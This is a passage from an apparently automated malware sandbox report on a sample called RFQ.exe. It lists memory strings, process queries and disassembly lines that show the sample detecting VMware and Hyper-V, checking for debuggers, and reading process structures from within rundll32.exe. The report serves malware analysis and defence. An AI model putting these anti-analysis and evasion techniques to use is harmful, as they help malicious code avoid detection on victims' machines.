          Source: explorer.exe, 00000008.00000000.418197319.00000000063F6000.00000004.00000001.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
          Source: explorer.exe, 00000008.00000000.423725449.00000000083EB000.00000004.00000001.sdmpBinary or memory string: VMware SATA CD00
          Source: explorer.exe, 00000008.00000000.418197319.00000000063F6000.00000004.00000001.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
          Source: explorer.exe, 00000008.00000000.422618645.00000000082E2000.00000004.00000001.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}>
          Source: explorer.exe, 00000008.00000002.608752063.0000000005D50000.00000002.00000001.sdmpBinary or memory string: A communication protocol error has occurred between the Hyper-V Host and Guest Compute Service.
          Source: explorer.exe, 00000008.00000002.608752063.0000000005D50000.00000002.00000001.sdmpBinary or memory string: The communication protocol version between the Hyper-V Host and Guest Compute Services is not supported.
          Source: explorer.exe, 00000008.00000000.422618645.00000000082E2000.00000004.00000001.sdmpBinary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&000000
          Source: explorer.exe, 00000008.00000000.423831795.0000000008430000.00000004.00000001.sdmpBinary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&000000-;
          Source: explorer.exe, 00000008.00000002.593605277.000000000095C000.00000004.00000020.sdmpBinary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}G
          Source: explorer.exe, 00000008.00000002.608752063.0000000005D50000.00000002.00000001.sdmpBinary or memory string: An unknown internal message was received by the Hyper-V Compute Service.
          Source: C:\Users\user\Desktop\RFQ.exeProcess information queried: ProcessInformationJump to behavior
          Source: C:\Users\user\Desktop\RFQ.exeProcess queried: DebugPortJump to behavior
          Source: C:\Windows\SysWOW64\rundll32.exeProcess queried: DebugPortJump to behavior
          Source: C:\Users\user\Desktop\RFQ.exeCode function: 7_2_00409A90 rdtsc 7_2_00409A90
          Source: C:\Users\user\Desktop\RFQ.exeCode function: 7_2_0040ACD0 LdrLoadDll,7_2_0040ACD0
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_0465746D mov eax, dword ptr fs:[00000030h]14_2_0465746D
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_0466A44B mov eax, dword ptr fs:[00000030h]14_2_0466A44B
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_046CC450 mov eax, dword ptr fs:[00000030h]14_2_046CC450
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_046CC450 mov eax, dword ptr fs:[00000030h]14_2_046CC450
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_0466BC2C mov eax, dword ptr fs:[00000030h]14_2_0466BC2C
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_046B6C0A mov eax, dword ptr fs:[00000030h]14_2_046B6C0A
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_046B6C0A mov eax, dword ptr fs:[00000030h]14_2_046B6C0A
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_046B6C0A mov eax, dword ptr fs:[00000030h]14_2_046B6C0A
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_046B6C0A mov eax, dword ptr fs:[00000030h]14_2_046B6C0A
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_046F1C06 mov eax, dword ptr fs:[00000030h]14_2_046F1C06
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_046F1C06 mov eax, dword ptr fs:[00000030h]14_2_046F1C06
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_046F1C06 mov eax, dword ptr fs:[00000030h]14_2_046F1C06
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_046F1C06 mov eax, dword ptr fs:[00000030h]14_2_046F1C06
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_046F1C06 mov eax, dword ptr fs:[00000030h]14_2_046F1C06
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_046F1C06 mov eax, dword ptr fs:[00000030h]14_2_046F1C06
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_046F1C06 mov eax, dword ptr fs:[00000030h]14_2_046F1C06
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_046F1C06 mov eax, dword ptr fs:[00000030h]14_2_046F1C06
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_046F1C06 mov eax, dword ptr fs:[00000030h]14_2_046F1C06
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_046F1C06 mov eax, dword ptr fs:[00000030h]14_2_046F1C06
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_046F1C06 mov eax, dword ptr fs:[00000030h]14_2_046F1C06
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_046F1C06 mov eax, dword ptr fs:[00000030h]14_2_046F1C06
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_046F1C06 mov eax, dword ptr fs:[00000030h]14_2_046F1C06
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_046F1C06 mov eax, dword ptr fs:[00000030h]14_2_046F1C06
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_0470740D mov eax, dword ptr fs:[00000030h]14_2_0470740D
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_0470740D mov eax, dword ptr fs:[00000030h]14_2_0470740D
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_0470740D mov eax, dword ptr fs:[00000030h]14_2_0470740D
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_046F14FB mov eax, dword ptr fs:[00000030h]14_2_046F14FB
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_046B6CF0 mov eax, dword ptr fs:[00000030h]14_2_046B6CF0
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_046B6CF0 mov eax, dword ptr fs:[00000030h]14_2_046B6CF0
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_046B6CF0 mov eax, dword ptr fs:[00000030h]14_2_046B6CF0
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_04708CD6 mov eax, dword ptr fs:[00000030h]14_2_04708CD6
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_0464849B mov eax, dword ptr fs:[00000030h]14_2_0464849B
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_0465C577 mov eax, dword ptr fs:[00000030h]14_2_0465C577
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_0465C577 mov eax, dword ptr fs:[00000030h]14_2_0465C577
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_04673D43 mov eax, dword ptr fs:[00000030h]14_2_04673D43
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_046B3540 mov eax, dword ptr fs:[00000030h]14_2_046B3540
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_04657D50 mov eax, dword ptr fs:[00000030h]14_2_04657D50
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_04708D34 mov eax, dword ptr fs:[00000030h]14_2_04708D34
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_04643D34 mov eax, dword ptr fs:[00000030h]14_2_04643D34
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_04643D34 mov eax, dword ptr fs:[00000030h]14_2_04643D34
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_04643D34 mov eax, dword ptr fs:[00000030h]14_2_04643D34
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_04643D34 mov eax, dword ptr fs:[00000030h]14_2_04643D34
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_04643D34 mov eax, dword ptr fs:[00000030h]14_2_04643D34
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_04643D34 mov eax, dword ptr fs:[00000030h]14_2_04643D34
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_04643D34 mov eax, dword ptr fs:[00000030h]14_2_04643D34
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_04643D34 mov eax, dword ptr fs:[00000030h]14_2_04643D34
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_04643D34 mov eax, dword ptr fs:[00000030h]14_2_04643D34
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_04643D34 mov eax, dword ptr fs:[00000030h]14_2_04643D34
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_04643D34 mov eax, dword ptr fs:[00000030h]14_2_04643D34
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_04643D34 mov eax, dword ptr fs:[00000030h]14_2_04643D34
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_04643D34 mov eax, dword ptr fs:[00000030h]14_2_04643D34
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_0463AD30 mov eax, dword ptr fs:[00000030h]14_2_0463AD30
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_046FE539 mov eax, dword ptr fs:[00000030h]14_2_046FE539
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_046BA537 mov eax, dword ptr fs:[00000030h]14_2_046BA537
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_04664D3B mov eax, dword ptr fs:[00000030h]14_2_04664D3B
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_04664D3B mov eax, dword ptr fs:[00000030h]14_2_04664D3B
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_04664D3B mov eax, dword ptr fs:[00000030h]14_2_04664D3B
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_0464D5E0 mov eax, dword ptr fs:[00000030h]14_2_0464D5E0
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_0464D5E0 mov eax, dword ptr fs:[00000030h]14_2_0464D5E0
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_046FFDE2 mov eax, dword ptr fs:[00000030h]14_2_046FFDE2
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_046FFDE2 mov eax, dword ptr fs:[00000030h]14_2_046FFDE2
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_046FFDE2 mov eax, dword ptr fs:[00000030h]14_2_046FFDE2
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_046FFDE2 mov eax, dword ptr fs:[00000030h]14_2_046FFDE2
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_046E8DF1 mov eax, dword ptr fs:[00000030h]14_2_046E8DF1
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_046B6DC9 mov eax, dword ptr fs:[00000030h]14_2_046B6DC9
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_046B6DC9 mov eax, dword ptr fs:[00000030h]14_2_046B6DC9
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_046B6DC9 mov eax, dword ptr fs:[00000030h]14_2_046B6DC9
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_046B6DC9 mov ecx, dword ptr fs:[00000030h]14_2_046B6DC9
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_046B6DC9 mov eax, dword ptr fs:[00000030h]14_2_046B6DC9
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_046B6DC9 mov eax, dword ptr fs:[00000030h]14_2_046B6DC9
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_046635A1 mov eax, dword ptr fs:[00000030h]14_2_046635A1
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_04661DB5 mov eax, dword ptr fs:[00000030h]14_2_04661DB5
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_04661DB5 mov eax, dword ptr fs:[00000030h]14_2_04661DB5
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_04661DB5 mov eax, dword ptr fs:[00000030h]14_2_04661DB5
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_047005AC mov eax, dword ptr fs:[00000030h]14_2_047005AC
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_047005AC mov eax, dword ptr fs:[00000030h]14_2_047005AC
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_04662581 mov eax, dword ptr fs:[00000030h]14_2_04662581
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_04662581 mov eax, dword ptr fs:[00000030h]14_2_04662581
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_04662581 mov eax, dword ptr fs:[00000030h]14_2_04662581
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_04662581 mov eax, dword ptr fs:[00000030h]14_2_04662581
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_04632D8A mov eax, dword ptr fs:[00000030h]14_2_04632D8A
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_04632D8A mov eax, dword ptr fs:[00000030h]14_2_04632D8A
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_04632D8A mov eax, dword ptr fs:[00000030h]14_2_04632D8A
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_04632D8A mov eax, dword ptr fs:[00000030h]14_2_04632D8A
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_04632D8A mov eax, dword ptr fs:[00000030h]14_2_04632D8A
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_0466FD9B mov eax, dword ptr fs:[00000030h]14_2_0466FD9B
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_0466FD9B mov eax, dword ptr fs:[00000030h]14_2_0466FD9B
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_0464766D mov eax, dword ptr fs:[00000030h]14_2_0464766D
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_0465AE73 mov eax, dword ptr fs:[00000030h]14_2_0465AE73
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_0465AE73 mov eax, dword ptr fs:[00000030h]14_2_0465AE73
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_0465AE73 mov eax, dword ptr fs:[00000030h]14_2_0465AE73
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_0465AE73 mov eax, dword ptr fs:[00000030h]14_2_0465AE73
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_0465AE73 mov eax, dword ptr fs:[00000030h]14_2_0465AE73
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_04647E41 mov eax, dword ptr fs:[00000030h]14_2_04647E41
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_04647E41 mov eax, dword ptr fs:[00000030h]14_2_04647E41
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_04647E41 mov eax, dword ptr fs:[00000030h]14_2_04647E41
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_04647E41 mov eax, dword ptr fs:[00000030h]14_2_04647E41
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_04647E41 mov eax, dword ptr fs:[00000030h]14_2_04647E41
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_04647E41 mov eax, dword ptr fs:[00000030h]14_2_04647E41
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_046FAE44 mov eax, dword ptr fs:[00000030h]14_2_046FAE44
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_046FAE44 mov eax, dword ptr fs:[00000030h]14_2_046FAE44
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_0463E620 mov eax, dword ptr fs:[00000030h]14_2_0463E620
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_046EFE3F mov eax, dword ptr fs:[00000030h]14_2_046EFE3F
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_0463C600 mov eax, dword ptr fs:[00000030h]14_2_0463C600
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_0463C600 mov eax, dword ptr fs:[00000030h]14_2_0463C600
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_0463C600 mov eax, dword ptr fs:[00000030h]14_2_0463C600
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_04668E00 mov eax, dword ptr fs:[00000030h]14_2_04668E00
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_046F1608 mov eax, dword ptr fs:[00000030h]14_2_046F1608
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_0466A61C mov eax, dword ptr fs:[00000030h]14_2_0466A61C
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_0466A61C mov eax, dword ptr fs:[00000030h]14_2_0466A61C
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_046616E0 mov ecx, dword ptr fs:[00000030h]14_2_046616E0
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_046476E2 mov eax, dword ptr fs:[00000030h]14_2_046476E2
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_04678EC7 mov eax, dword ptr fs:[00000030h]14_2_04678EC7
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_04708ED6 mov eax, dword ptr fs:[00000030h]14_2_04708ED6
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_046636CC mov eax, dword ptr fs:[00000030h]14_2_046636CC
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_046EFEC0 mov eax, dword ptr fs:[00000030h]14_2_046EFEC0
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_046B46A7 mov eax, dword ptr fs:[00000030h]14_2_046B46A7
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_04700EA5 mov eax, dword ptr fs:[00000030h]14_2_04700EA5
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_04700EA5 mov eax, dword ptr fs:[00000030h]14_2_04700EA5
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_04700EA5 mov eax, dword ptr fs:[00000030h]14_2_04700EA5
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_046CFE87 mov eax, dword ptr fs:[00000030h]14_2_046CFE87
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_0464FF60 mov eax, dword ptr fs:[00000030h]14_2_0464FF60
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_04708F6A mov eax, dword ptr fs:[00000030h]14_2_04708F6A
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_0464EF40 mov eax, dword ptr fs:[00000030h]14_2_0464EF40
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_04634F2E mov eax, dword ptr fs:[00000030h]14_2_04634F2E
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_04634F2E mov eax, dword ptr fs:[00000030h]14_2_04634F2E
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_0466E730 mov eax, dword ptr fs:[00000030h]14_2_0466E730
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_0466A70E mov eax, dword ptr fs:[00000030h]14_2_0466A70E
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_0466A70E mov eax, dword ptr fs:[00000030h]14_2_0466A70E
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_0465F716 mov eax, dword ptr fs:[00000030h]14_2_0465F716
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_046CFF10 mov eax, dword ptr fs:[00000030h]14_2_046CFF10
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_046CFF10 mov eax, dword ptr fs:[00000030h]14_2_046CFF10
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_0470070D mov eax, dword ptr fs:[00000030h]14_2_0470070D
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_0470070D mov eax, dword ptr fs:[00000030h]14_2_0470070D
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_046737F5 mov eax, dword ptr fs:[00000030h]14_2_046737F5
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_04648794 mov eax, dword ptr fs:[00000030h]14_2_04648794
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_046B7794 mov eax, dword ptr fs:[00000030h]14_2_046B7794
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_046B7794 mov eax, dword ptr fs:[00000030h]14_2_046B7794
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_046B7794 mov eax, dword ptr fs:[00000030h]14_2_046B7794
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_04701074 mov eax, dword ptr fs:[00000030h]14_2_04701074
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_046F2073 mov eax, dword ptr fs:[00000030h]14_2_046F2073
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_04650050 mov eax, dword ptr fs:[00000030h]14_2_04650050
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_04650050 mov eax, dword ptr fs:[00000030h]14_2_04650050
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_0466002D mov eax, dword ptr fs:[00000030h]14_2_0466002D
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_0466002D mov eax, dword ptr fs:[00000030h]14_2_0466002D
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_0466002D mov eax, dword ptr fs:[00000030h]